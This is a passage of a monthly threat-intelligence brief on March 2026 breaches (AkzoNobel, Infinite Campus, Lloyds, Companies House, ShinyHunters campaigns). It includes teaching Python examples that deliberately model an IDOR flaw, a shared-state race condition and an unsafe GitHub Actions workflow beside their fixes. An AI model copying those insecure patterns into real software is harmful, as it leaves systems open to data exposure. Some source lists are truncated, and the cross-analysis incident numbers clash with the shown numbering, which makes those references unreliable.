Amazon MadPot identified the campaign after discovering a misconfigured Interlock server exposing the group's complete toolkit organized by victim. Companion CVE-2026-20079 (auth bypass, CVSS 10.0) was patched simultaneously.

Post-disclosure, Zscaler detected exploitation by additional actors using public PoC code.

Interlock (100+ victims, suspected Rhysida spinoff) deployed AI-generated malware (Slopoly), a BYOVD EDR-killer (Hotta Killer), and multi-layered persistence including JS RAT, Java RAT, memory-resident webshell, and ScreenConnect.

This is the second edge device zero-day in this brief alongside the F5 BIG-IP reclassification, reinforcing that network security appliance management planes are now a primary attack surface.

• CVE: CVE-2026-20131 (CVSS 10.0, CWE-502) + CVE-2026-20079 (CVSS 10.0)

• Zero-Day Window: 36 days (Jan 26 - Mar 4, 2026)

• Affected: FMC 6.4.0.13-10.0.0 (69+ versions) + Cisco SCC. No workarounds.

• Actor: Interlock / Hive0163 (100+ victims; suspected Rhysida spinoff)

• CISA: KEV catalog March 19; marked for ransomware use

• Exposure: ~300-700 internet-facing FMC instances (Censys/FOFA)

Sources: Cisco PSIRT (cisco-sa-fmc-rce-NKhnULJh), NVD (CVE-2026-20131), CISA KEV Catalog, CISA/FBI Advisory AA25-203A, AWS Security Blog, The Hacker News, Help Net Security, The Register, The Record, CSO Online, Security Affairs, BleepingComputer, Zscaler ThreatLabz, Qualys ThreatPROTECT, IBM X-Force, Sekoia, Arctic Wolf, Penligent, Purple Ops, FortiGuard Labs, VulnCheck, ransomware.live, Censys, FOFA

Full Analysis: https://zerotolerance.me/cyberthreats/interlock-cisco-fmc-cve-2026-20131

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

20. AkzoNobel: Anubis Ransomware Steals 170GB - Passports, Client Agreements, Financial Records

EU (Netherlands / USA) | Anubis | March 1, 2026

Dutch multinational AkzoNobel - the world's third-largest paint and coatings producer (EUR 10.2B revenue, 34,600 employees) - confirmed hackers breached one of its US facilities. Anubis ransomware claimed responsibility, exfiltrating approximately 170,000 files (170GB).

Published samples include passport scans, confidential client agreements, employee and financial records, email correspondence, and technical specification sheets.

AkzoNobel serves Boeing, Airbus, BAE Systems, and the US military - leaked technical specs may include ITAR-controlled data.

The breach occurs during a pending $25B all-stock merger with Axalta Coating Systems.

Anubis (65 victims since December 2024) operates a unique three-tier affiliate model and explicitly threatens to report breaches to regulatory bodies including the EDPB, ICO, and HHS. Maximum GDPR fine exposure is EUR 406M (4% of EUR 10.158B revenue).

• Data Stolen: 170GB (~170,000 files)

• Data Types: Passport scans, client agreements, financial records, technical specs

• Actor: Anubis ransomware (65 victims; three-tier RaaS model)

• Scope: US site; pending $25B Axalta merger

• GDPR Fine Exposure: Up to EUR 406M

Sources: BleepingComputer, TechRadar, Cybernews, Check Point Research, CySecurity News, SC Media, FalconFeeds, DeXpose, Prism News, RedPacket Security, DWM Magazine, USGlass Magazine, ransomware.live, Trend Micro, KELA Cyber, Sophos (Secureworks), Proven Data, Picus Security, AkzoNobel Investor Relations

Full Analysis: https://zerotolerance.me/cyberthreats/akzonobel-anubis-ransomware

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

21. Infinite Campus: ShinyHunters Breach K-12 Platform Serving 11M Students via 10-Minute Vishing Attack

USA | ShinyHunters | March 18, 2026

ShinyHunters breached Infinite Campus - the largest privately held K-12 student information system in the US, serving 3,200+ school districts and 11 million students across 46 states - through a 10-minute voice phishing attack on a single offsite employee.

The attacker impersonated IT support, relayed credentials in real time to bypass MFA, and accessed the company's Salesforce instance. Within 10 minutes, Infinite Campus detected and ejected the attacker.

Only Salesforce directory data (staff names and contact information) was accessed - no student records, no education data, no SSNs. ShinyHunters posted a ransom threat with a March 25 deadline; Infinite Campus refused to engage. No data has been published.

• Data accessed: Staff directory information (names, contact details) from Salesforce

• NOT compromised: Student records, education data, SSNs, SIS platform

• Detection time: 10 minutes

• Actor: ShinyHunters (UNC6240) - part of systematic Salesforce vishing campaign

• Platform: 11M students, 3,200+ districts, 46 states

Sources: BleepingComputer, Cybernews, TechRadar, DataBreaches.net, CyberInsider, Prism News, Security Boulevard, SC Media, UpGuard, RedPacket Security, K12TechPro, ClaimDepot, Migliaccio & Rathod LLP, Netcrook, Dark Web Informer, Orange County Schools (NC DPI), Privacy Guides, Rankiteo, Mitiga, Varonis, Google Cloud Blog (Mandiant), AppOmni, Infinite Campus (FERPA Policy), US Department of Education (PTAC), FTC (COPPA Rule 2025)

Full Analysis: https://zerotolerance.me/cyberthreats/infinite-campus-shinyhunters-k12-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

22. Intoxalock: Cyberattack Bricks 150,000 Court-Mandated DUI Devices Across 46 States for 8 Days

USA | Unknown | March 14, 2026

A cyberattack on Consumer Safety Technology (d/b/a Intoxalock) disabled backend calibration systems for approximately 150,000 court-mandated ignition interlock devices across 46 states.

For 8 days (March 14-22), drivers in court-ordered DUI monitoring programs could not calibrate their devices, causing lockouts and undriveable vehicles. The named plaintiff was fired after his device locked him out, his car shut off while he was driving, and he incurred $1,000+ in towing costs.

Class action filed March 26 (S.D. Iowa). Intoxalock collects uniquely sensitive data: breath alcohol levels, GPS coordinates, facial photographs, court case numbers. No federal cybersecurity standards exist for interlock vendors.

• Affected: ~150,000 users across 46 states

• Outage: 8 days (March 14-22, 2026)

• Data at risk: BAC measurements, GPS, facial photos, court records

• Legal: Curry v. Consumer Safety Technology LLC (4:2026cv00134)

• Company: L Catterton portfolio company, ~$136M revenue

Company, ByteIota, CEO Outlook, Technology.org, DysruptionHub, Justia (Curry v.

Full Analysis: https://zerotolerance.me/cyberthreats/intoxalock-cyberattack-dui-interlock-devices-bricked

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

23. UK Companies House: Browser Back Button Exposes 5.43M Companies' Directors' Protected Data for 152 Days

UK | Software vulnerability | March 13, 2026

A broken access control flaw in the Companies House WebFiling service - introduced during the October 2025 GOV.UK One Login migration - let any authenticated user access any company's private dashboard by pressing the browser back button four times.

Directors' residential addresses (statutorily suppressed under Companies Act 2006 Section 240), full dates of birth, and filing capabilities were exposed for 152 days (October 13, 2025 - March 13, 2026).

The flaw was discovered by John Hewitt (Ghost Mail) and escalated by Dan Neidle (Tax Policy Associates). The service was shut down for 67.5 hours; the ICO and NCSC were notified. Companies House holds ISO 27001 and PCI DSS certifications.

• Exposed: 5.43M companies' directors' DOBs and protected addresses

• Exposure window: 152 days

• Vulnerability: IDOR + session management failure (OWASP A01:2021)

• Regulatory: ICO investigation ongoing

Sources: GOV.UK (Companies House), Tax Policy Associates (Dan Neidle), The Register, Help Net Security, BleepingComputer, Cybersecurity News, Computer Weekly, SecurityWeek, UpGuard, ACCA Global, GB News, Cybersecurity Intelligence, CyberPress, SC Media, Digit.fyi, Punchline Gloucester, Bright SG, Elemental CoSec, Morris Owen, Virtual Company Secretary, Companies House Annual Report 2024-2025, GOV.UK One Login

Full Analysis: https://zerotolerance.me/cyberthreats/uk-companies-house-webfiling-broken-access-control
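The brief classifies this as IDOR plus a session management failure. The code below is an added example of that failure class and its fix, written for this brief and not taken from Companies House or the WebFiling service, whose actual defect is not described in this detail: a dashboard handler that checks only that the caller is logged in, beside one that authorizes the (user, company) pair and forbids the browser from caching the authenticated page. The company register, entitlements and user names are constructed placeholders.

```python
"""Model of the access-control failure class the brief names (IDOR plus session
state) in a company-dashboard handler. Added example, not Companies House code;
company numbers, names and users are constructed placeholders.
"""
import secrets

# Constructed register. The protected fields are the kinds the brief says were
# exposed: residential addresses suppressed under s.240 and full dates of birth.
COMPANIES = {
    "00000001": {"name": "Example One Ltd", "director": "A. Director",
                 "director_dob": "1970-01-01", "home_address": "1 Private Road (protected)"},
    "00000002": {"name": "Example Two Ltd", "director": "B. Director",
                 "director_dob": "1985-06-30", "home_address": "2 Private Road (protected)"},
}
# Which authenticated user may act for which company.
ENTITLEMENTS = {"alice": {"00000001"}, "bob": {"00000002"}}


class SessionStore:
    def __init__(self):
        self._sessions = {}

    def login(self, user: str) -> str:
        sid = secrets.token_urlsafe(16)
        self._sessions[sid] = {"user": user}
        return sid

    def user_for(self, sid: str) -> str:
        if sid not in self._sessions:
            raise PermissionError("401: not authenticated")
        return self._sessions[sid]["user"]


class VulnerableDashboard:
    """Authenticates the caller, then serves any company by number (IDOR)."""
    def __init__(self):
        self.sessions = SessionStore()

    def dashboard(self, sid: str, company_number: str) -> dict:
        self.sessions.user_for(sid)            # authentication only, no authorization
        return {"status": 200, "headers": {}, "body": COMPANIES[company_number]}


class HardenedDashboard:
    """Authorizes the (user, company) pair and forbids caching of the response."""
    def __init__(self):
        self.sessions = SessionStore()

    def dashboard(self, sid: str, company_number: str) -> dict:
        user = self.sessions.user_for(sid)
        if company_number not in ENTITLEMENTS.get(user, set()):
            # Same response whether or not the company exists: no enumeration oracle.
            raise PermissionError("403: not entitled to this company")
        return {
            "status": 200,
            # no-store keeps the browser from replaying the page from its cache, so
            # the back button cannot re-render protected data after logout or a user switch.
            "headers": {"Cache-Control": "no-store", "Pragma": "no-cache"},
            "body": COMPANIES[company_number],
        }


def demo() -> dict:
    """Alice, logged in to each app, asks for Bob's company dashboard."""
    outcome = {}
    vuln = VulnerableDashboard()
    sid = vuln.sessions.login("alice")
    outcome["vulnerable_leaked_address"] = vuln.dashboard(sid, "00000002")["body"]["home_address"]

    hard = HardenedDashboard()
    sid = hard.sessions.login("alice")
    try:
        hard.dashboard(sid, "00000002")
        outcome["hardened_blocked"] = False
    except PermissionError:
        outcome["hardened_blocked"] = True
    own = hard.dashboard(sid, "00000001")
    outcome["hardened_cache_control"] = own["headers"]["Cache-Control"]
    return outcome


if __name__ == "__main__":
    print(demo())
```

The authorization check is the substantive fix; the `Cache-Control: no-store` header addresses the second half of the brief's classification, because a correctly authorized page that the browser is allowed to cache can still be shown to the next person at the keyboard by navigating back.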

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

24. Crunchyroll: 6.8M Users Exposed After Infostealer Compromises TELUS Support Agent's Okta Credentials

USA | Unattributed (SLSH ecosystem assessed) | March 12, 2026

A threat actor breached Crunchyroll - the Sony-owned anime streaming platform (17M paid subscribers, 120M registered users, 200+ countries) - by compromising the Okta SSO credentials of a TELUS Digital support agent in India via infostealer malware.

The attacker accessed 7 internal systems over a multi-day period, exfiltrating 6.8 million email addresses from 8 million support tickets, plus 100GB of internal data. A $5M ransom was demanded; a subset was listed by user "hubert" for $2K on BreachForums.

Attribution is disputed: BleepingComputer was told the attacker is separate from ShinyHunters, but the attack occurred via a TELUS agent workstation during ShinyHunters' concurrent TELUS breach, and the infostealer-via-phishing TTP matches ShinyHunters' earlier Snowflake campaign playbook.

Crunchyroll does not appear on ShinyHunters' Tor leak site, suggesting at minimum a peripheral operator rather than core ShinyHunters. Assessed as likely SLSH ecosystem-affiliated. Sony ($1.175B Crunchyroll acquisition) inherits liability.

• Data stolen: 6.8M emails, support tickets, 100GB internal data

• Ransom: $5M demanded

• Vector: Infostealer malware on TELUS agent workstation

• Systems accessed: 7

• Sony GDPR exposure: up to 4% of $88.7B revenue (~$3.5B theoretical max)

Sources: BleepingComputer, TechCrunch, The Record, TechRadar, Cybernews, CyberSecurity News, CX Today, The CyberSec Guru, Netcrook, Screen Rant, Prism News, Insurance Journal, Anime Corner, AnimeMojo, GIGAZINE, Beebom, Anime News Network, TopClassActions, Cyber Daily, SC Media, WebProNews, Cyberpress, Privacy Guides, ResetEra, GameSpot (Sony acquisition), Hollywood Reporter (Sony acquisition)

Full Analysis: https://zerotolerance.me/cyberthreats/crunchyroll-telus-okta-shinyhunters-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

25. Lloyds Banking Group: API Race Condition Exposes 447,936 Customers' NI Numbers in 4-Hour Mobile App Failure

UK | Software defect | March 12, 2026

A software defect in an overnight API update broke transaction isolation across the Lloyds, Halifax, and Bank of Scotland mobile apps for 4 hours 40 minutes (03:28-08:08 GMT).

When two customers requested transactions within fractions of a second, the API returned the wrong customer's data. Of 447,936 customers exposed, 114,182 clicked into erroneous transactions and viewed sort codes, account numbers, and National Insurance numbers.

No cyberattack - a pure engineering failure during a performance optimization. GBP 139,000 has been paid to 3,625 complainants (avg GBP 38). FCA and ICO investigations are active.
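The failure pattern the brief describes, two requests within fractions of a second and the API answering one with the other's data, is what happens when per-request state is kept somewhere shared between requests. The code below is an added example written for this brief, not Lloyds code (the actual defect is not described in this detail): a two-step handler that parks the in-flight customer on a shared service object, beside the same handler using a ContextVar, with a barrier that forces the worst-case interleaving so the leak is reproducible rather than timing-dependent. The ledger and customer ids are constructed.

```python
"""Model of a request-isolation failure of the kind the brief describes: two
requests arriving within fractions of a second, and the API answering one with
the other's data. Added example, not Lloyds code; the ledger is constructed.
"""
import threading
from contextvars import ContextVar

# Constructed ledger: the only rows a customer may ever see are their own.
LEDGER = {
    "cust-A": [("2026-03-12", -42.10, "coffee")],
    "cust-B": [("2026-03-12", 1250.00, "salary")],
}


class SharedStateApi:
    """Vulnerable: a 'performance optimization' keeps the in-flight customer on
    the service object, which every worker thread shares."""
    def __init__(self):
        self._current = None

    def begin(self, customer_id: str) -> None:
        self._current = customer_id            # step 1: record who is asking

    def transactions(self) -> list:
        return LEDGER[self._current]           # step 2: answer from shared state


class ContextScopedApi:
    """Fixed: the in-flight customer lives in a ContextVar, which is private to
    each thread (and each asyncio task), so concurrent requests cannot cross."""
    def __init__(self):
        self._current = ContextVar("customer_id")

    def begin(self, customer_id: str) -> None:
        self._current.set(customer_id)

    def transactions(self) -> list:
        return LEDGER[self._current.get()]


def simulate(api, customers=("cust-A", "cust-B")) -> dict:
    """Run one request per customer on its own thread and force the worst-case
    interleaving: every request finishes step 1 before any request runs step 2.
    Returns {customer_id: rows_the_api_returned}."""
    barrier = threading.Barrier(len(customers))
    results = {}

    def request(customer_id):
        api.begin(customer_id)
        barrier.wait()
        results[customer_id] = api.transactions()

    threads = [threading.Thread(target=request, args=(c,)) for c in customers]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


def leaked(results: dict) -> list:
    """Customers who were shown rows belonging to someone else."""
    return sorted(cid for cid, rows in results.items() if rows is not LEDGER[cid])


if __name__ == "__main__":
    print("shared state leaks to:", leaked(simulate(SharedStateApi())))
    print("context-scoped leaks to:", leaked(simulate(ContextScopedApi())))
```

With the shared-state API exactly one of the two customers always receives the other's rows, whichever thread wrote the shared field last; with the context-scoped API neither does. Passing the customer id explicitly through every call is the simpler fix; the ContextVar is shown because it fits the "request context" pattern that this kind of optimization usually replaces.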

• Exposed: 447,936 customers; 114,182 viewed others' NI numbers

• Data: Sort codes, account numbers, National Insurance numbers

• Duration: 4h40m (03:28-08:08 GMT, March 12)

• Compensation: GBP 139,000 to 3,625 complainants

• Lloyds FY2025: GBP 19.4B total income, 30M customers

Sources: UK Parliament Treasury Committee, The Register, TechRadar, Computing.co.uk, Hackread, Cyber Magazine, SecurityWeek, Cybernews, Computer Weekly, Infosecurity Magazine, MoneySavingExpert, FinTech Magazine, Retail Banker International, Scottish Financial News, Scottish Legal News, Signature Litigation, GB News, Bloomberg, Lloyds Banking Group 2025 Annual Results, FCA (Operational Resilience, SM&CR, Consumer Duty, TSB Final Notice), ICO, Simply Wall St, Dataproof, WebProNews

Full Analysis: https://zerotolerance.me/cyberthreats/lloyds-banking-group-api-race-condition-data-exposure

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

26. Aura: Identity Protection Company Breached by ShinyHunters - 903K Records Stolen via Vishing

USA | ShinyHunters | March 11, 2026

ShinyHunters breached Aura - a Boston-based identity protection company ($1.6B valuation, ~$216M standalone ARR) - through targeted vishing of an employee. 903,100 records were exfiltrated, per Have I Been Pwned.

However, approximately 865,000 records were legacy Circle Media Labs marketing contacts acquired in December 2021 that had been sitting on a legacy platform for five years. Fewer than 20,000 active customers had addresses and phone numbers exposed.

The structural irony - an identity protection company breached - is significant, but the actual customer impact is limited. Aura detected and revoked access within approximately one hour.

• Records exposed: 903,100 (865K legacy Circle Media Labs data)

• Active customers affected: <20,000

• Detection time: ~1 hour

• Actor: ShinyHunters (UNC6240)

• Company: $1.6B valuation, $216M standalone ARR

Sources: BleepingComputer, Help Net Security, SecurityWeek, Bitdefender, CyberInsider, Gizmodo, Tom's Guide, Cybernews, Have I Been Pwned, Aura Official Statement (March 17 2026), Aura Security Incident Update (March 19 2026), CyberScoop, Google Threat Intelligence Group (Mandiant), Silent Push, Resecurity, ReliaQuest, Picus Security, Flare, ClaimDepot, Shamis & Gentile, Migliaccio & Rathod, PRNewswire (Circle Media Labs acquisition), VentureBeat (Aura Series F), Aura Investor Relations (Series G-II, Qoria acquisition)

Full Analysis: https://zerotolerance.me/cyberthreats/aura-identity-protection-shinyhunters-breach

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

27. Woflow: SaaS Supply Chain Breach Exposes Walmart, DoorDash, Uber, and Deliveroo - 326GB Published

USA | ShinyHunters | March 3, 2026

ShinyHunters breached Woflow Inc. - a San Francisco-based AI merchant data platform ($10.8M funding, ~26 employees) serving as the data infrastructure layer for Walmart, DoorDash, Uber, and Deliveroo.

A 326GB compressed archive was published after ransom refusal, containing SSNs, driver's licenses, financial accounts, credit cards, merchant onboarding data, and OAuth2 access/refresh tokens.

DoorDash's exposure is doubled via its $3.9B acquisition of Deliveroo (September 2025). Class action filed (N.D. ). As of March 31, 2026 - 28 days post-breach - Woflow has issued zero public statements, zero breach notifications, and zero state AG filings.

• Data published: 326GB - SSNs, financial data, OAuth tokens

• Clients exposed: Walmart, DoorDash, Uber, Deliveroo

• Actor: ShinyHunters (UNC6240)

• Legal: Suhr v. Woflow Inc. (3:26-cv-02161, N.D. Cal.)

• Silence: 28 days, zero notifications

• GDPR exposure: Up to ~$549M (4% of DoorDash $13.7B revenue)

Sources: Cybernews, SC Media, Security Boulevard, BrinzTech, SecurityBrief, AppOmni, ClassAction.org, Class Action U, Mason LLP (Mason & Perry), Migliaccio & Rathod LLP, Justia (Suhr v. Woflow Inc.

Full Analysis: https://zerotolerance.me/cyberthreats/woflow-shinyhunters-supply-chain-breach-walmart-doordash-uber-deliveroo

28. INTERPOL Operation Synergia III: 45,000 Malicious IPs Dismantled, 94 Arrested Across 72 Countries

Global | INTERPOL + 72 Member States | March 13, 2026

INTERPOL coordinated the largest international cyber takedown operation of 2026, dismantling 45,000 malicious IP addresses and arresting 94 individuals across 72 countries between November 2025 and March 2026. Operation Synergia III targeted phishing infrastructure, infostealer operations, and ransomware command-and-control servers.

Private sector partners Group-IB, S2W, and Team Cymru provided threat intelligence. This represents a 3,361% increase from Synergia I (1,300 IPs in 2023) and a 105% increase from Synergia II (22,000 IPs in 2024).

• Scale: 45,000+ malicious IPs taken down, 94 arrested, 72 countries

• Regional: Macau shut down 33,000+ malicious domains, Bangladesh arrested 40 suspects, Togo arrested 10

• Partners: Group-IB, S2W, Team Cymru (Kaspersky excluded between Synergia II and III)

• MENA participation: Bahrain, Iraq, Jordan, Kuwait, Lebanon, Oman, Qatar, UAE (Saudi Arabia notably absent)

• Concurrent: SocksEscort residential proxy service dismantled (369,000 compromised routers, $3.5M crypto seized)

• Context: Largest coordinated cyber law enforcement operation of 2026 to date

Sources: INTERPOL, The Register, Help Net Security, Hackread, Infosecurity Magazine, SecurityAffairs, Security MEA, Group-IB, BleepingComputer, The Record, ScamWatchHQ, TechNadu, Computer Weekly, Sahara Reporters, Europol (SocksEscort), International Enforcement Law Reporter, CPO Magazine, Capital FM Kenya, CXO Insight Middle East, Intelligent CISO, TechAfrica News, BackBox.org, Cyberwarzone, Archyde, Red Packet Security, The Edvocate, IBTimes UK, The420.in, Yahoo News

Full Analysis: https://zerotolerance.me/cyberthreats/interpol-synergia-iii-takedown-2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

29. Passaic County, NJ: Medusa Ransomware Disables Government Services for 526,000 Residents

USA | Medusa (Frozen Spider) | March 4, 2026

Medusa ransomware knocked out all IT systems and phone lines across Passaic County, New Jersey - a county government serving 526,000 residents across 16 municipalities.

County offices in Paterson went dark on March 4. Medusa claimed credit on March 17 alongside two other public-sector targets (Cape May County NJ and Lehigh Carbon Community College PA), demanding $800,000 by end of March.

This is the same Medusa operation that shut down all 35 clinics at the University of Mississippi Medical Center for nine days with the identical $800,000 demand.

• Residents: ~526,000 across 16 municipalities

• Ransom: $800,000 (identical to UMMC demand)

• Systems: All county phone lines and IT systems disabled

• Timeline: March 4 attack, March 17 Medusa claim, March 18 partial restoration

• Investigation: FBI and NJ Office of Homeland Security and Preparedness involved

• Pattern: Same actor, same ransom, same month as UMMC - coordinated public-sector campaign

• Notifications: No breach notification letters sent to residents as of late March

Sources: The Record, Comparitech, SC Media, NJ 101.5 (nj1015.com), Patch.com, ABC7 New York, DysruptionHub, TAPinto, FalconFeeds.io, Daily Voice, The Ridgewood Blog, CISA Advisory AA25-071A, Secureworks, Symantec, Barracuda, Check Point, The Hacker News, SecurityWeek, Infosecurity Magazine, KPMG, Ransomware.live, DeXpose, SWK Technologies, GiaSpace, Rankiteo

Full Analysis: https://zerotolerance.me/cyberthreats/passaic-county-medusa-ransomware-2026

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

02

CROSS-INCIDENT ANALYSIS

Supply Chain Attacks - Worst Month on Record (Incidents 01, 02, 07, 12, 13, 29)

March 2026 may be the worst month for software supply chain attacks in history. The Axios npm hijack (100M weekly downloads, 80% of cloud environments) demonstrated that a single stolen maintainer token can weaponize the most ubiquitous HTTP library in the JavaScript ecosystem.

TeamPCP's three-link credential chain from Trivy through LiteLLM to Telnyx introduced WAV steganography and ICP blockchain C2. GlassWorm deployed a self-propagating worm across 433 components spanning VSCode, GitHub, and npm using Solana blockchain C2. And ShinyHunters' breach of Woflow - a 26-employee SaaS vendor - exposed Walmart, DoorDash, Uber, and Deliveroo in a single attack, demonstrating that SaaS supply chains are as dangerous as software supply chains.

Four independent supply chain campaigns targeted developer and enterprise infrastructure simultaneously. The npm ecosystem alone saw two major incidents (Axios and TeamPCP) in the same month.

Every organization running CI/CD pipelines or integrating third-party SaaS APIs was in the blast radius.

Iran Cyber Escalation - Four Fronts, Multiple MOIS Groups (Incidents 08, 11, 15, 17, 20)

Iran's Ministry of Intelligence and Security ran the most operationally diverse cyber campaign month in its history.

MuddyWater pre-positioned backdoors on US critical infrastructure before hostilities began (espionage), Handala published the FBI Director's personal emails (information warfare), NasirSecurity compromised Gulf energy supply chain vendors (strategic intelligence), and Handala doxxed 28 Lockheed Martin engineers in Israel with death threats (intimidation).

These are not isolated incidents - they represent coordinated multi-domain operations by an intelligence service using at least three distinct operational groups simultaneously.

The fabricated 375TB APT IRAN claim alongside Handala's verified operations demonstrates a two-track approach: noise generation for headlines and real operations for impact.

TeamPCP Supply Chain Credential Chain - Trivy to LiteLLM to Telnyx (Incidents 07, 12, 13)

A single misconfigured GitHub Actions workflow spawned the most significant software supply chain campaign of 2026. The credential chain is precise: stolen PAT from Trivy's trivy-action repository led to credentials that compromised LiteLLM on PyPI (480M downloads), which yielded the PyPI tokens used to backdoor the Telnyx SDK (730K monthly downloads).

Each link expanded the blast radius while introducing new techniques - from /proc/pid/mem credential stealing to ICP blockchain C2 to WAV audio steganography. The campaign infected 1,000+ cloud environments and demonstrated that security tooling itself is attack surface.

The chain's speed - 27 days from initial compromise to the third victim - outpaces most organizations' third-party risk assessment cycles.
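The chain started, per the brief, with a misconfigured GitHub Actions workflow and a stolen PAT. The brief does not say what the misconfiguration was, so the script below is an added example of general workflow hygiene checks rather than a description of the trivy-action incident: it flags action references not pinned to a commit SHA, a `pull_request_target` trigger that checks out the pull request head, and a missing top-level `permissions` block. Both workflow texts are constructed, the action names are placeholders, and the 40-hex values are fabricated placeholders, not real commits. Parsing is line-based so no YAML library is needed.

```python
"""Audit a GitHub Actions workflow for hygiene gaps that let a workflow leak
credentials. Added example, not the brief's code and not a description of the
trivy-action workflow. Workflow texts, action names and SHAs are constructed
placeholders; the SHAs are not real commits.
"""
import re

WEAK_WORKFLOW = """\
name: ci
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - uses: example-org/scanner-action@main
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - run: npm ci
"""

HARDENED_WORKFLOW = """\
name: ci
on:
  pull_request:
permissions:
  contents: read
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: example-org/scanner-action@89abcdef0123456789abcdef0123456789abcdef
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567
      - run: npm ci
"""

USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s#]+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def audit_workflow(text: str) -> list:
    """Return findings; an empty list means every check passed."""
    lines = text.splitlines()
    findings = []
    pr_target = any(re.match(r"^\s*pull_request_target\s*:", l) for l in lines)
    top_level_permissions = any(re.match(r"^permissions\s*:", l) for l in lines)
    checks_out_pr_head = False

    for idx, line in enumerate(lines, start=1):
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith(("./", "docker://")):
            continue                               # local or image refs: out of scope here
        name, _, version = ref.partition("@")
        if not SHA_RE.match(version):
            shown = version or "<none>"
            findings.append(f"line {idx}: {name} pinned to mutable ref '{shown}', not a commit SHA")
        if name == "actions/checkout":
            # Inspect this step's `with:` block for a checkout of the PR head.
            for follow in lines[idx: idx + 6]:
                if USES_RE.match(follow) or follow.lstrip().startswith("- run:"):
                    break
                if "pull_request.head" in follow:
                    checks_out_pr_head = True

    if pr_target and checks_out_pr_head:
        findings.append("pull_request_target + checkout of the PR head: untrusted code runs with the repository token and secrets")
    if not top_level_permissions:
        findings.append("no top-level permissions block: GITHUB_TOKEN gets the repository default scope in every job")
    return findings


if __name__ == "__main__":
    for label, wf in (("weak", WEAK_WORKFLOW), ("hardened", HARDENED_WORKFLOW)):
        print(label, audit_workflow(wf) or ["no findings"])
```

A mutable tag such as `@v4` or `@main` means the code a workflow runs can change without any change to the repository that calls it, which is the property a supply chain attacker needs; pinning to a SHA makes every upstream change a reviewable diff. The weak sample produces four findings and the hardened one none.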

Infostealer Evolution - Hardware Breakpoints and macOS ClickFix (Incidents 05, 06)

VoidStealer's hardware breakpoint technique for bypassing Chrome App-Bound Encryption (ABE) and Infiniti Stealer's Nuitka-compiled ClickFix campaign represent the next generation of credential theft malware.

VoidStealer's approach is particularly notable: by using CPU debug registers (hardware breakpoints) to intercept encryption keys without writing to browser memory, it evades all existing memory integrity checks. Twelve versions in three months demonstrate malware-as-a-service (MaaS) development velocity.

Meanwhile, Infiniti Stealer brings the ClickFix social engineering technique to macOS with native Mach-O compilation that resists reverse engineering. Together, these two families signal that the infostealer ecosystem is innovating faster than browser security controls can adapt.

Edge Device Exploitation - F5 BIG-IP and Cisco FMC (Incidents 04, 21)

Two network security appliance management planes were actively exploited: F5 BIG-IP (CVE-2025-53521, CVSS 9.8, reclassified from DoS to RCE after five months) and Cisco FMC (CVE-2026-20131, CVSS 10.0, exploited 36 days pre-disclosure).

Both involved memory-resident webshells and tampered integrity checks. Both received CISA KEV listings.

The F5 case is particularly instructive: organizations that triaged the October 2025 advisory as "DoS-only" and deprioritized patching discovered five months later they were running unauthenticated RCE on 240,000+ exposed instances.

Advisory misclassification creates systemic risk at scale.

European Institutions Under Siege (Incident 14 plus January MDM breach)

The European Commission was breached twice in under two months - first via Ivanti EPMM zero-days in January (MDM breach), then via AWS cloud compromise in March (350GB claimed by ShinyHunters). The Commission confirmed data was taken in both incidents.

The institution responsible for drafting and enforcing GDPR cannot secure its own infrastructure. While the Commission is technically governed by Regulation (EU) 2018/1725 rather than GDPR, the credibility damage to European data protection enforcement is significant.

If the body that fines companies billions for data protection failures is itself repeatedly breached, the normative authority of GDPR is undermined.

ShinyHunters Systematic SaaS Campaign - Six Confirmed Attacks in One Month (Incidents 14, 16, 23, 28, 29 + Figure)

ShinyHunters (UNC6240) executed at least six confirmed attacks in March 2026 - the most prolific single-actor campaign since Lapsus$ in early 2022. The targets span sectors (telecom, government, education, identity protection, food delivery) but share a common playbook: vishing or credential theft to compromise SaaS platforms (Salesforce, Okta, GCP, AWS), followed by rapid data exfiltration and ransom demands.

TELUS (1PB), Woflow (326GB), EU Commission (350GB claimed), Aura (903K records), and Infinite Campus (directory data only) demonstrate that ShinyHunters treats SaaS supply chains as force multipliers - one compromised vendor exposes data from dozens of downstream customers.

The Woflow breach alone exposed Walmart, DoorDash, Uber, and Deliveroo through a single 26-employee vendor.

Note: the Crunchyroll breach (Incident 26) was attributed to a separate attacker by BleepingComputer, not ShinyHunters, despite occurring via a TELUS agent workstation during the same period.

Google/Mandiant tracks the ShinyHunters collective as the SLSH (Scattered Lapsus$ Hunters) ecosystem.

UK Data Protection Failures - Two Incidents, 5.9M Affected (Incidents 25, 27)

Two UK institutions suffered data exposure incidents in the same week: Lloyds Banking Group exposed 447,936 customers' National Insurance numbers through an API race condition, and Companies House exposed 5.43 million companies' directors' protected addresses and dates of birth through a browser back-button bypass.

Neither was a cyberattack - both were engineering failures. The Lloyds defect existed for 4 hours 40 minutes; the Companies House flaw persisted for 152 days.

